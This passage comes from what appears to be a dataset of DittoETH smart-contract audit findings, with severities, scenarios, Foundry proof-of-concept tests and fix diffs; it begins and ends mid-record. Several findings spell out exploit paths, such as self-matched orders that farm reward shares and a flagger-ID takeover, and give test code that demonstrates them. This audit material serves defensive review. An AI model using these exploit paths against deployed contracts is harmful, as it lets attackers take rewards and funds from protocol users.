Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n -Malicious trader can intentionally obtain `dittoMatchedShares` in some edges casesчlowчMalicious trader can intentionally obtain `dittoMatchedShares` by creating a bid order using a low price that nobody will ask, then wait for more than 14 days and the same malicious trader create an ask order using the same bid's low price causing the increase of `dittoMatchedShares`.\\nMalicious trader can create a bid order using the BidOrdersFacet::createBid() function at very low price, then the same malicious trader can wait some days until the minumum required in order to get `dittoMatchedShares` and set a `ask` order using the bid's low price. 
Please consider the next scenario:\\n```\\nMarket status:\\nassetX: current price 100\\n```\\n\\nMalicious trader creates the `bid order` for the `assetX` using the `price: 10` (low price compared to the current 100 price) and `ercAmount 10`. The low price is because nobody wants to sell at that price so the order can stay there without being matched.\\nThe `bid order` will be submitted to the order book because there are not `asks/sells` to fill at that price.\\nMalicious trader waits for more than 14 days. Additionally the malicious trader needs to wait until there are not `asks/sells` in the order book.\\nOnce the step 3 is ok, the Malicious trader creates the `ask order` at `price 10 and ercAmount10` (the bid's order price from step 1). The order is matched with the `bid order` from the step 1 and `dittoMatchedShares` are assigned to the malicious trader.\\nIt is a very edge case because the malicious trader needs an empty `ask/sells` orderbook so he can put his own `ask order` at the malicious bid order price but in conditions where the asset is not very traded the malicious actor can benefit from this.чVerify that the address from the `bid order` is not the same address that is creating the `ask` order.чMalicious actor can intentionally obtain `dittoMatchedShares` using `bid/asks` orders that he intentionally crafts. 
The `bid/ask` orders are created by the same malicious actor, so he won't lose assets.\\nTools used\\nManual reviewч```\\nMarket status:\\nassetX: current price 100\\n```\\n -Primary liquidation fee distribution may revert due to the inability to cover the caller feesчmediumчFee distribution during the primary short liquidation may revert due to an arithmetic underflow error in case the TAPP's escrowed ETH balance is insufficient to cover the caller (liquidator) fees.\\nDuring the primary liquidation, the `_marginFeeHandler` function called in line 126 handles the fee distribution for the liquidator (i.e., caller).\\nIf the eligible caller fee (callerFee) is less or equal to the ETH escrowed by the TAPP, the fee is deducted from `TAPP.ethEscrowed` and added to the liquidators escrowed ETH balance, `VaultUser.ethEscrowed`, in lines 271-274.\\nOtherwise, if the TAPP's escrowed ETH is insufficient to cover the caller fees, i.e., the `else` branch in line 274, the caller is given the `tappFee` instead of `gasFee`.\\nHowever, if `m.totalFee` exceeds the TAPP's `ethEscrowed`, it reverts with an arithmetic underflow error in line 278. This can be the case if the TAPP has little to no ETH escrowed after placing the forced bid as part of the liquidation, attempting to buy the debt token amount required to repay the short position's debt. 
In case the short's collateral is not sufficient to buy the debt tokens, the TAPP's escrowed ETH is utilized as well, potentially depleting the TAPP's escrowed ETH.\\nConsequently, the remaining `TAPP.ethEscrowed` is potentially lower than the calculated `m.totalFee`, resulting in the arithmetic underflow error in line 278.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L278\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) 
tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\nчPrimary liquidation fee distribution may revert due to the inability to cover the caller fees\\nConsider checking if the TAPP's `ethEscrowed` is sufficient to cover the `m.totalFee` before deducting the fee from the TAPP's `ethEscrowed` balance and if not, give the caller the TAPP's `ethEscrowed` balance.чThe primary short liquidation fails, requiring to wait until the short position's collateral is sufficient to buy the debt tokens or the TAPP has sufficient collateral, or, if the short's collateral ratio further decreases, the short position is liquidated via the secondary liquidation (which adds additional risk to the peg of the asset as the overall collateral ratio could fall below 100%).ч```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) 
tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n -Flag can be overriden by another userчhighчThe `setFlagger` function allows a new flagger to reuse `flaggerHint` flag id after `LibAsset.firstLiquidationTime` has passed after flagId has been updated.\\n```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L377-L404C13\\nSince the previous flagger can only liquidate the flagged short after `LibAsset.firstLiquidationTime` has passed, the flagged short will be unliquidated till that time. Both the ability to flag the short for first flagger and the ability to replace the first flagger starts at the same instant. 
This allows a new flagger to take control over the liquidation of the flagged short by finding some other liquidatable short and passing in the flagId of the previous flagger as the `flagHint`.\\nPOC Test\\n```\\ndiff --git a/test/MarginCallFlagShort.t.sol b/test/MarginCallFlagShort.t.sol\\nindex 906657e..3d7f985 100644\\n--- a/test/MarginCallFlagShort.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/MarginCallFlagShort.t.sol\\n@@ -169,6 // Add the line below\\n169,90 @@ contract MarginCallFlagShortTest is MarginCallHelper {\\n assertEq(diamond.getFlagger(shortRecord.flaggerId), extra);\\n }\\n \\n// Add the line below\\n function test_FlaggerId_Override_Before_Call() public {\\n// Add the line below\\n address flagger1 = address(77);\\n// Add the line below\\n address flagger2 = address(78);\\n// Add the line below\\n\\n// Add the line below\\n vm.label(flagger1, \"flagger1\");\\n// Add the line below\\n vm.label(flagger2, \"flagger2\");\\n// Add the line below\\n\\n// Add the line below\\n //create first short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord1 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 1);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag first short\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n diamond.flagShort(asset, sender, shortRecord1.id, Constants.HEAD);\\n// Add the line below\\n shortRecord1 = diamond.getShortRecord(asset, sender, 
shortRecord1.id);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger1);\\n// Add the line below\\n\\n// Add the line below\\n skip(TEN_HRS_PLUS);\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n\\n// Add the line below\\n //attempting direct liquidation by flagger2 fails since only allowed to flagger1\\n// Add the line below\\n\\n// Add the line below\\n //add ask order to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n uint16[] memory shortHintArray = setShortHintArray();\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //cancel the previously created ask order\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //reset\\n// Add the line below\\n setETH(4000 ether);\\n// Add the line below\\n\\n// Add the line below\\n //create another short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 0);\\n// Add the line below\\n 
assertEq(diamond.getFlagger(shortRecord2.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag second short by providing flagger id of flagger1. this resets the flagger id\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.flagShort(\\n// Add the line below\\n asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1, uint16(shortRecord1.flaggerId)\\n// Add the line below\\n );\\n// Add the line below\\n shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n //flagger1 has been replaced\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), flagger2);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger2);\\n// Add the line below\\n\\n// Add the line below\\n //ask to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //now flagger1 cannot liquidate shortRecord1\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //but flagger1 can\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function test_FlagShort_FlaggerId_Recycling_AfterIncreaseCollateral() public {\\n createAndFlagShort();\\n \\n```\\nчUpdate the check to 
`secondLiquidationTime`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibShortRecord.sol b/contracts/libraries/LibShortRecord.sol\\nindex 7c5ecc3..c8736b0 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibShortRecord.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibShortRecord.sol\\n@@ // Remove the line below\\n391,7 // Add the line below\\n391,7 @@ library LibShortRecord {\\n // Remove the line below\\n s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re// Remove the line below\\nuse an inactive flaggerId\\n// Remove the line below\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n// Add the line below\\n if (timeDiff > LibAsset.secondLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n } else if (s.flaggerIdCounter < type(uint16).max) {\\n```\\nчFirst flagger will be in loss of the spent gas and expected reward.ч```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? 
LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n -Combining shorts can incorrectly reset the shorts flagчmediumчThe protocol allows users to combine multiple short positions into one as long as the combined short stays above the primary collateral ratio. The function is also able to reset an active flag from any of the combined shorts if the final ratio is above the primaryLiquidationCR.\\nThe issue is that the combineShorts function does not call updateErcDebt, which is called in every other function that is able to reset a shorts flag. This means that if the debt is outdated the final combined short could incorrectly reset the flag putting the position on a healthy ratio when it really isn't. This would also mean that it will have to be reflagged and go through the timer again before it can be liquidated.\\nThe combine shorts function merges all short records into the short at position id[0]. 
Focusing on the debt aspect it adds up the total debt and calculates the ercDebtSocialized of all positions except for the first.\\n```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n\\nIt then merges this total to the first position using the merge function and this will give us the combined short.\\n```\\n// Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n```\\n\\nFinally we check if the position had an active flag and if it did, we check if the new combined short is in a healthy enough state to reset the flag, if not the whole function reverts.\\n```\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n```\\n\\nAs you can see the updateErcDebt function is not called anywhere in the function meaning the flag could be reset with outdated values.чCall updateErcDebt on the short once it is combined in the combineShorts function to ensure the collateral ratio is calculated with the most up to date values.\\n```\\n function combineShorts(address asset, uint8[] memory ids)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, ids[0])\\n {\\n // Initial code\\n\\n // Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, 
c.shortUpdatedAt);\\n\\n firstShort.updateErcDebt(asset); // update debt here before checking flag\\n\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n emit Events.CombineShorts(asset, msg.sender, ids);\\n }\\n```\\nчA short could have its flag incorrectly reset and reset the timer. This is not good for the protocol as it will have an unhealthy short for a longer time.ч```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n -Event in secondaryLiquidation could be misused to show false liquidationsчlowчThe `liquidateSecondary` function in the protocol is designed to emit events detailing the specifics of liquidation, which can be crucial for other protocols or front-end integrations that track secondary liquidations within the protocol. One of the values emitted is `batches`, which indicates which positions got liquidated. However, the function emits the `batches` array as it initially receives it, even though it may skip positions that are not eligible for liquidation during its execution. 
This implies that the emitted event could represent incorrect data, indicating positions as liquidated even if they were not, due to their ineligibility.\\n```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\nчEvent in secondaryLiquidation could be misused to show false liquidations\\nModify the `batches` array before emitting it in the event, ensuring it accurately reflects the positions that were actually liquidated.чThis inconsistency in the emitted event data can lead to incorrect data, indicating positions as liquidated even if they were not.ч```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n -`Errors.InvalidTwapPrice()` is never invoked when `if (twapPriceInEther == 0)` is trueчlowчThe protocol expects to `revert` with `Errors.InvalidTwapPrice()` when twapPriceInEther == 0:\\n```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n\\nHowever, the control never reaches Line 88 when `twapPriceInEther` is zero. 
It rather reverts before that with error `Division or modulo by 0`.\\nNOTE: Due to this bug, `Errors.InvalidTwapPrice()` is never invoked/thrown by the protocol even under satisfactory conditions, even though it has been defined.\\nSince I could not find any helper function inside `contracts/` or `test/` which lets one set the `twapPrice` returned by uint256 `twapPrice` = IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes); to zero for testing purposes, I have created a simplified PoC which targets the problem area:\\nSave the following as a file named `test/InvalidTwapPriceErrorCheck.t.sol` and run the test via `forge test --mt testInvalidTwapPriceErrNeverInvoked -vv`. You will find that the test reverts with error `Division or modulo by 0`, but not with `Errors.InvalidTwapPrice()`. The PoC uses the same underlying math libraries and logic path as the protocol does in `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()`.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Constants} from \"contracts/libraries/Constants.sol\";\\nimport {Errors} from \"contracts/libraries/Errors.sol\";\\nimport {U256} from \"contracts/libraries/PRBMathHelper.sol\";\\nimport {OBFixture} from \"test/utils/OBFixture.sol\";\\n\\ncontract InvalidTwapPriceErrorCheck is OBFixture {\\n using U256 for uint256;\\n\\n function getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n // Following code is copied as-is from\\n // `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()#L85-L89`\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert 
Errors.InvalidTwapPrice(); // @audit : unreachable code\\n }\\n }\\n\\n function getZeroTwapPriceInEther_CorrectStyle()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n if (twapPriceInEther == 0) { \\n revert Errors.InvalidTwapPrice();\\n }\\n twapPriceInv = twapPriceInEther.inv();\\n }\\n\\n function testInvalidTwapPriceErrNeverInvoked() public pure {\\n getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol();\\n }\\n\\n function testInvalidTwapPriceErrInvokedCorrectly() public {\\n vm.expectRevert(Errors.InvalidTwapPrice.selector);\\n getZeroTwapPriceInEther_CorrectStyle();\\n }\\n}\\n```\\n\\n\\nIn the above test file, you can also run the test which invokes the \"fixed\" or \"correct\" code style via `forge test --mt testInvalidTwapPriceErrInvokedCorrectly -vv`. 
This will invoke the `Errors.InvalidTwapPrice` error, as expected.чThe check on Line 87 (if condition) needs to be performed immediately after Line 85.\\n```\\n 85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n 86 if (twapPriceInEther == 0) {\\n// Add the line below\\n 87 revert Errors.InvalidTwapPrice();\\n// Add the line below\\n 88 }\\n// Add the line below\\n 89 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 86 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 87 if (twapPriceInEther == 0) {\\n// Remove the line below\\n 88 revert Errors.InvalidTwapPrice();\\n// Remove the line below\\n 89 }\\n```\\n\\nThe above fix needed to be done because the `inv()` call caused a revert even before control used to reach the `if` condition.чProtocol owner or developer monitoring for a revert due to `Errors.InvalidTwapPrice()` in the logs will never see it and will make debugging & issue resolution harder.ч```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n -Rounding-up of user's `cRatio` causes loss for the protocolчmediumчAt multiple places in the code, user's collateral ratio has been calculated in a manner which causes loss of precision (rounding-up) due to division before multiplication. 
This causes potential loss for the DittoETH protocol, among other problems.\\nRoot Cause\\nUse of the following piece of code causes rounding-up:\\nStyle 1\\n```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n\\nStyle 2\\n```\\nuint256 oraclePrice = LibOracle.getOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getPrice(asset);\\n // rest of code\\n // rest of code\\n // rest of code\\nuint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n```\\n\\n\\nLet's break the issue down into 4 smaller parts:\\nPART 1:\\nLet us first look inside getOraclePrice():\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 20 function getOraclePrice(address asset) internal view returns (uint256) {\\n 21 AppStorage storage s = appStorage();\\n 22 AggregatorV3Interface baseOracle = AggregatorV3Interface(s.baseOracle);\\n 23 uint256 protocolPrice = getPrice(asset);\\n 24 // prettier-ignore\\n 25 (\\n 26 uint80 baseRoundID,\\n 27 int256 basePrice,\\n 28 /*uint256 baseStartedAt*/\\n 29 ,\\n 30 uint256 baseTimeStamp,\\n 31 /*uint80 baseAnsweredInRound*/\\n 32 ) = baseOracle.latestRoundData();\\n 33\\n 34 AggregatorV3Interface oracle = AggregatorV3Interface(s.asset[asset].oracle);\\n 35 if (address(oracle) == address(0)) revert Errors.InvalidAsset();\\n 36\\n 37 if (oracle == baseOracle) {\\n 38 //@dev multiply base oracle by 10**10 to give it 18 decimals of precision\\n 39 uint256 basePriceInEth = basePrice > 0\\n 40 ? 
uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()\\n 41 : 0;\\n 42 basePriceInEth = baseOracleCircuitBreaker(\\n 43 protocolPrice, baseRoundID, basePrice, baseTimeStamp, basePriceInEth\\n 44 );\\n 45 return basePriceInEth;\\n 46 } else {\\n 47 // prettier-ignore\\n 48 (\\n 49 uint80 roundID,\\n 50 int256 price,\\n 51 /*uint256 startedAt*/\\n 52 ,\\n 53 uint256 timeStamp,\\n 54 /*uint80 answeredInRound*/\\n 55 ) = oracle.latestRoundData();\\n 56 uint256 priceInEth = uint256(price).div(uint256(basePrice));\\n 57 oracleCircuitBreaker(\\n 58 roundID, baseRoundID, price, basePrice, timeStamp, baseTimeStamp\\n 59 );\\n 60 return priceInEth;\\n 61 }\\n 62 }\\n```\\n\\nBased on whether the `oracle` is `baseOracle` or not, the function returns either `basePriceEth` or `priceInEth`.\\n`basePriceEth` can be `uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()` which is basically `1e36 / (basePrice * Constants.BASE_ORACLE_DECIMALS)` or simply written, of the form `oracleN / oracleD` where `oracleN` is the numerator with value 1e36 (as defined here) and `oracleD` is the denominator.\\n`priceInEth` is given as uint256 `priceInEth` = uint256(price).div(uint256(basePrice)) which again is of the form `oracleN / oracleD`.\\n\\nPART 2:\\ngetSavedOrSpotOraclePrice() too internally calls the above `getOraclePrice()` function, if it has been equal to or more than 15 minutes since the last time `LibOrders.getOffsetTime()` was set:\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 153 function getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n 154 if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n 155 return getPrice(asset);\\n 156 } else {\\n 157 return getOraclePrice(asset);\\n 158 }\\n 159 }\\n```\\n\\n\\nPART 3:\\ngetCollateralRatioSpotPrice() calculates `cRatio` as:\\n```\\n File: contracts/libraries/LibShortRecord.sol\\n\\n 30 function getCollateralRatioSpotPrice(\\n 31 STypes.ShortRecord memory short,\\n 32 uint256 
oraclePrice\\n 33 ) internal pure returns (uint256 cRatio) {\\n 34 return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n 35 }\\n```\\n\\n\\nPART 4 (FINAL PART):\\nThere are multiple places in the code (mentioned below under Impacts section) which compare the user's `cRatio` to `initialCR` or `LibAsset.primaryLiquidationCR(_asset)` in the following manner:\\n```\\nif (short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset)) < LibAsset.primaryLiquidationCR(asset))\\n```\\n\\n\\nCalling `short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))` means the value returned from it would be:\\n```\\n // @audit-issue : Potential precision loss. Division before multiplication should not be done.\\n shortCollateral / (shortErcDebt * (oracleN / oracleD)) // return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n```\\n\\nwhich has the potential for precision loss (rounding-up) due to division before multiplication. The correct style ought to be:\\n```\\n// Add the line below\\n (shortCollateral * oracleD) / (shortErcDebt * oracleN)\\n```\\n\\n\\nHave attempted to keep all values in close proximity to the ones present in forked mainnet tests.\\nLet's assume some values for numerator & denominator and other variables:\\n```\\n uint256 private short_collateral = 100361729669569000000; // ~ 100 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // oracleD\\n uint256 private primaryLiquidationCR = 2000000000000000000; // 2 ether (as on forked mainnet)\\n\\n// For this example, we assume that oracle != baseOracle, so that the below calculation would be done by the protocol\\nSo calculated priceInEth = price.div(basePrice) = 501808648347845 // ~ 0.0005 ether\\n```\\n\\n\\nLet's calculate for the scenario of `flagShort()` where the code logic says:\\n```\\n 53 if (\\n 54 
short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true`, then revert, due to rounding-up and the short will incorrectly escape flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n```\\n\\n\\nCreate a file named `test/IncorrectCRatioCheck.t.sol` and paste the following code in it. Some mock functions are included here which mirror protocol's calculation style:\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {U256} from \"contracts/libraries/PRBMathHelper.sol\";\\nimport {OBFixture} from \"test/utils/OBFixture.sol\";\\nimport {console} from \"contracts/libraries/console.sol\";\\n\\ncontract IncorrectCRatioCheck is OBFixture {\\n using U256 for uint256;\\n\\n uint256 private short_collateral = 85307470219133700000; // ~ 85.3 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // (as on forked mainnet) // 